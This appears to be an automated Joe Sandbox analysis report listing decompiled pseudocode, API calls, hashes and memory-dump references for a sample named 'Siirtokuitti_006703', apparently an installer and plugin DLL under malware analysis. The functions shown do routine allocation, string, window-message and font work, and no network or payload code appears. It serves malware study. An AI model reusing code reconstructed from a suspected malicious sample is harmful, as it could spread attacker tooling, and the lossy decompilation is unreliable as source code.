                                                                                                                      • Opcode ID: 37e85ddb9be2dc002cbc54129097367b9b9ebad6f0759c5621231ed1513c13a2
                                                                                                                      • Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
                                                                                                                      • Opcode Fuzzy Hash: 37e85ddb9be2dc002cbc54129097367b9b9ebad6f0759c5621231ed1513c13a2
                                                                                                                      • Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 85%
                                                                                                                      			E100022D0(void* __edx) {
                                                                                                                      				void* _t37;
                                                                                                                      				signed int _t38;
                                                                                                                      				void* _t39;
                                                                                                                      				void* _t41;
                                                                                                                      				signed int* _t42;
                                                                                                                      				signed int* _t51;
                                                                                                                      				void* _t52;
                                                                                                                      				void* _t54;
                                                                                                                      
                                                                                                                      				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                                                      				while(1) {
                                                                                                                      					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                                                      					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                                                      					_t52 = _t51[6];
                                                                                                                      					if(_t52 == 0) {
                                                                                                                      						goto L9;
                                                                                                                      					}
                                                                                                                      					_t41 = 0x1a;
                                                                                                                      					if(_t52 == _t41) {
                                                                                                                      						goto L9;
                                                                                                                      					}
                                                                                                                      					if(_t52 != 0xffffffff) {
                                                                                                                      						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                                                      							_t51[6] = _t41;
                                                                                                                      							goto L12;
                                                                                                                      						} else {
                                                                                                                      							_t37 = E100012BA(_t52 - 1);
                                                                                                                      							L10:
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						_t37 = E10001243();
                                                                                                                      						L11:
                                                                                                                      						_t52 = _t37;
                                                                                                                      						L12:
                                                                                                                      						_t13 =  &(_t51[2]); // 0x1020
                                                                                                                      						_t42 = _t13;
                                                                                                                      						if(_t51[1] != 0xffffffff) {
                                                                                                                      						}
                                                                                                                      						_t38 =  *_t51;
                                                                                                                      						_t51[7] = 0;
                                                                                                                      						if(_t38 > 7) {
                                                                                                                      							L27:
                                                                                                                      							_t39 = GlobalFree(_t52);
                                                                                                                      							if( *(_t54 + 0x10) == 0) {
                                                                                                                      								return _t39;
                                                                                                                      							}
                                                                                                                      							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                                                      							} else {
                                                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                                                      							}
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
                                                                                                                      								case 0:
                                                                                                                      									 *_t42 = 0;
                                                                                                                      									goto L27;
                                                                                                                      								case 1:
                                                                                                                      									__eax = E10001311(__ebp);
                                                                                                                      									goto L21;
                                                                                                                      								case 2:
                                                                                                                      									 *__edi = E10001311(__ebp);
                                                                                                                      									__edi[1] = __edx;
                                                                                                                      									goto L27;
                                                                                                                      								case 3:
                                                                                                                      									__eax = GlobalAlloc(0x40,  *0x1000406c);
                                                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                                                      									__edx = 0;
                                                                                                                      									 *__edi = __eax;
                                                                                                                      									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
                                                                                                                      									goto L27;
                                                                                                                      								case 4:
                                                                                                                      									__eax = E1000122C(__ebp);
                                                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                                                      									L21:
                                                                                                                      									 *__edi = __eax;
                                                                                                                      									goto L27;
                                                                                                                      								case 5:
                                                                                                                      									__eax = GlobalAlloc(0x40, 0x10);
                                                                                                                      									_push(__eax);
                                                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                                                      									_push(__ebp);
                                                                                                                      									 *__edi = __eax;
                                                                                                                      									__imp__CLSIDFromString();
                                                                                                                      									goto L27;
                                                                                                                      								case 6:
                                                                                                                      									if( *__ebp != __cx) {
                                                                                                                      										__eax = E10001311(__ebp);
                                                                                                                      										 *__ebx = __eax;
                                                                                                                      									}
                                                                                                                      									goto L27;
                                                                                                                      								case 7:
                                                                                                                      									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                                                      									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                                                                      									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                                                                      									asm("cdq");
                                                                                                                      									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
                                                                                                                      									goto L27;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					L9:
                                                                                                                      					_t37 = E1000122C(0x10004044);
                                                                                                                      					goto L10;
                                                                                                                      				}
                                                                                                                      			}











                                                                                                                      0x100022e4
                                                                                                                      0x100022e8
                                                                                                                      0x100022f3
                                                                                                                      0x100022f3
                                                                                                                      0x100022fa
                                                                                                                      0x100022ff
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10002303
                                                                                                                      0x10002306
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1000230b
                                                                                                                      0x10002316
                                                                                                                      0x10002326
                                                                                                                      0x00000000
                                                                                                                      0x1000231d
                                                                                                                      0x1000231f
                                                                                                                      0x10002335
                                                                                                                      0x00000000
                                                                                                                      0x10002335
                                                                                                                      0x1000230d
                                                                                                                      0x1000230d
                                                                                                                      0x10002336
                                                                                                                      0x10002336
                                                                                                                      0x10002338
                                                                                                                      0x1000233c
                                                                                                                      0x1000233c
                                                                                                                      0x1000233f
                                                                                                                      0x1000233f
                                                                                                                      0x10002347
                                                                                                                      0x1000234e
                                                                                                                      0x10002351
                                                                                                                      0x10002410
                                                                                                                      0x10002411
                                                                                                                      0x1000241c
                                                                                                                      0x10002446
                                                                                                                      0x10002446
                                                                                                                      0x1000242c
                                                                                                                      0x10002438
                                                                                                                      0x1000242e
                                                                                                                      0x1000242e
                                                                                                                      0x1000242e
                                                                                                                      0x00000000
                                                                                                                      0x10002357
                                                                                                                      0x10002357
                                                                                                                      0x00000000
                                                                                                                      0x1000235e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10002366
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10002374
                                                                                                                      0x10002376
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10002397
                                                                                                                      0x1000239d
                                                                                                                      0x100023a0
                                                                                                                      0x100023a2
                                                                                                                      0x100023b2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1000237f
                                                                                                                      0x10002384
                                                                                                                      0x10002387
                                                                                                                      0x10002388
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x100023be
                                                                                                                      0x100023c4
                                                                                                                      0x100023c5
                                                                                                                      0x100023c8
                                                                                                                      0x100023c9
                                                                                                                      0x100023cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x100023d7
                                                                                                                      0x100023da
                                                                                                                      0x100023e6
                                                                                                                      0x100023e8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x100023f4
                                                                                                                      0x10002400
                                                                                                                      0x10002403
                                                                                                                      0x10002405
                                                                                                                      0x10002408
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10002357
                                                                                                                      0x10002351
                                                                                                                      0x1000232b
                                                                                                                      0x10002330
                                                                                                                      0x00000000
                                                                                                                      0x10002330

                                                                                                                      APIs
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19421717588.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19421678749.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421756473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421792485.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4216380887-0
                                                                                                                      • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                      • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                                      • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                      • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E00401DB3(intOrPtr __edx) {
                                                                                                                      				void* __esi;
                                                                                                                      				int _t9;
                                                                                                                      				signed char _t15;
                                                                                                                      				struct HFONT__* _t18;
                                                                                                                      				intOrPtr _t30;
                                                                                                                      				struct HDC__* _t31;
                                                                                                                      				void* _t33;
                                                                                                                      				void* _t35;
                                                                                                                      
                                                                                                                      				_t30 = __edx;
                                                                                                                      				_t31 = GetDC( *(_t35 - 8));
                                                                                                                      				_t9 = E00402C15(2);
                                                                                                                      				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                                                                      				0x40cde0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                                                      				ReleaseDC( *(_t35 - 8), _t31);
                                                                                                                      				 *0x40cdf0 = E00402C15(3);
                                                                                                                      				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                                                      				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                                                                      				 *0x40cdf7 = 1;
                                                                                                                      				 *0x40cdf4 = _t15 & 0x00000001;
                                                                                                                      				 *0x40cdf5 = _t15 & 0x00000002;
                                                                                                                      				 *0x40cdf6 = _t15 & 0x00000004;
                                                                                                                      				E004063D2(_t9, _t31, _t33, 0x40cdfc,  *((intOrPtr*)(_t35 - 0x24)));
                                                                                                                      				_t18 = CreateFontIndirectW(0x40cde0);
                                                                                                                      				_push(_t18);
                                                                                                                      				_push(_t33);
                                                                                                                      				E004062F7();
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}











                                                                                                                      0x00401db3
                                                                                                                      0x00401dbe
                                                                                                                      0x00401dc0
                                                                                                                      0x00401dcd
                                                                                                                      0x00401de4
                                                                                                                      0x00401de9
                                                                                                                      0x00401df6
                                                                                                                      0x00401dfb
                                                                                                                      0x00401dff
                                                                                                                      0x00401e0a
                                                                                                                      0x00401e11
                                                                                                                      0x00401e23
                                                                                                                      0x00401e29
                                                                                                                      0x00401e2e
                                                                                                                      0x00401e38
                                                                                                                      0x0040258c
                                                                                                                      0x0040156d
                                                                                                                      0x00402a65
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(?), ref: 00401DB6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                                                                      • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3808545654-0
                                                                                                                      • Opcode ID: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                                                                                      • Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
                                                                                                                      • Opcode Fuzzy Hash: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                                                                                      • Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
                                                                                                                      				_Unknown_base(*)()* _t7;
                                                                                                                      				void* _t10;
                                                                                                                      				int _t14;
                                                                                                                      
                                                                                                                      				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                                                      				_t10 = GlobalAlloc(0x40, _t14);
                                                                                                                      				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                                                      				_t7 = GetProcAddress(_a4, _t10);
                                                                                                                      				GlobalFree(_t10);
                                                                                                                      				return _t7;
                                                                                                                      			}






                                                                                                                      0x10001619
                                                                                                                      0x10001625
                                                                                                                      0x10001632
                                                                                                                      0x10001639
                                                                                                                      0x10001642
                                                                                                                      0x1000164e

                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19421717588.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19421678749.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421756473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421792485.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1148316912-0
                                                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00401D57() {
                                                                                                                      				void* _t18;
                                                                                                                      				struct HINSTANCE__* _t22;
                                                                                                                      				struct HWND__* _t25;
                                                                                                                      				void* _t27;
                                                                                                                      
                                                                                                                      				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
                                                                                                                      				GetClientRect(_t25, _t27 - 0x58);
                                                                                                                      				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
                                                                                                                      				if(_t18 != _t22) {
                                                                                                                      					DeleteObject(_t18);
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t27 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}







                                                                                                                      0x00401d63
                                                                                                                      0x00401d6a
                                                                                                                      0x00401d99
                                                                                                                      0x00401da1
                                                                                                                      0x00401da8
                                                                                                                      0x00401da8
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1849352358-0
                                                                                                                      • Opcode ID: 39d170b61a276badab7fabc378d590f7deb7bc5a659c4b130cda474fb786c5a2
                                                                                                                      • Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
                                                                                                                      • Opcode Fuzzy Hash: 39d170b61a276badab7fabc378d590f7deb7bc5a659c4b130cda474fb786c5a2
                                                                                                                      • Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 59%
                                                                                                                      			E00401C19(intOrPtr __edx) {
                                                                                                                      				int _t29;
                                                                                                                      				long _t30;
                                                                                                                      				signed int _t32;
                                                                                                                      				WCHAR* _t35;
                                                                                                                      				long _t36;
                                                                                                                      				int _t41;
                                                                                                                      				signed int _t42;
                                                                                                                      				int _t46;
                                                                                                                      				int _t56;
                                                                                                                      				intOrPtr _t57;
                                                                                                                      				struct HWND__* _t61;
                                                                                                                      				void* _t64;
                                                                                                                      
                                                                                                                      				_t57 = __edx;
                                                                                                                      				_t29 = E00402C15(3);
                                                                                                                      				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                                      				 *(_t64 - 0x10) = _t29;
                                                                                                                      				_t30 = E00402C15(4);
                                                                                                                      				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                                      				 *(_t64 + 8) = _t30;
                                                                                                                      				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                                                                      					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
                                                                                                                      				}
                                                                                                                      				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                                                                      				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                                                                      					 *(_t64 + 8) = E00402C37(0x44);
                                                                                                                      				}
                                                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                                                                      				_push("true");
                                                                                                                      				if(__eflags != 0) {
                                                                                                                      					_t59 = E00402C37();
                                                                                                                      					_t32 = E00402C37();
                                                                                                                      					asm("sbb ecx, ecx");
                                                                                                                      					asm("sbb eax, eax");
                                                                                                                      					_t35 =  ~( *_t31) & _t59;
                                                                                                                      					__eflags = _t35;
                                                                                                                      					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                                                      					goto L10;
                                                                                                                      				} else {
                                                                                                                      					_t61 = E00402C15();
                                                                                                                      					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                                      					_t41 = E00402C15(2);
                                                                                                                      					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                                      					_t56 =  *(_t64 - 0x14) >> 2;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
                                                                                                                      						L10:
                                                                                                                      						 *(_t64 - 0x30) = _t36;
                                                                                                                      					} else {
                                                                                                                      						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
                                                                                                                      						asm("sbb eax, eax");
                                                                                                                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                                                                      				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                                                                      					_push( *(_t64 - 0x30));
                                                                                                                      					E004062F7();
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}















                                                                                                                      0x00401c19
                                                                                                                      0x00401c1b
                                                                                                                      0x00401c22
                                                                                                                      0x00401c25
                                                                                                                      0x00401c28
                                                                                                                      0x00401c32
                                                                                                                      0x00401c36
                                                                                                                      0x00401c39
                                                                                                                      0x00401c42
                                                                                                                      0x00401c42
                                                                                                                      0x00401c45
                                                                                                                      0x00401c49
                                                                                                                      0x00401c52
                                                                                                                      0x00401c52
                                                                                                                      0x00401c55
                                                                                                                      0x00401c59
                                                                                                                      0x00401c5b
                                                                                                                      0x00401cb0
                                                                                                                      0x00401cb2
                                                                                                                      0x00401cbd
                                                                                                                      0x00401cc7
                                                                                                                      0x00401cca
                                                                                                                      0x00401cca
                                                                                                                      0x00401cd3
                                                                                                                      0x00000000
                                                                                                                      0x00401c5d
                                                                                                                      0x00401c64
                                                                                                                      0x00401c66
                                                                                                                      0x00401c69
                                                                                                                      0x00401c6f
                                                                                                                      0x00401c76
                                                                                                                      0x00401c79
                                                                                                                      0x00401ca1
                                                                                                                      0x00401cd9
                                                                                                                      0x00401cd9
                                                                                                                      0x00401c7b
                                                                                                                      0x00401c89
                                                                                                                      0x00401c91
                                                                                                                      0x00401c94
                                                                                                                      0x00401c94
                                                                                                                      0x00401c79
                                                                                                                      0x00401cdc
                                                                                                                      0x00401cdf
                                                                                                                      0x00401ce5
                                                                                                                      0x00402a65
                                                                                                                      0x00402a65
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                      • String ID: !
                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                      • Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                      • Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
                                                                                                                      • Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                      • Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 58%
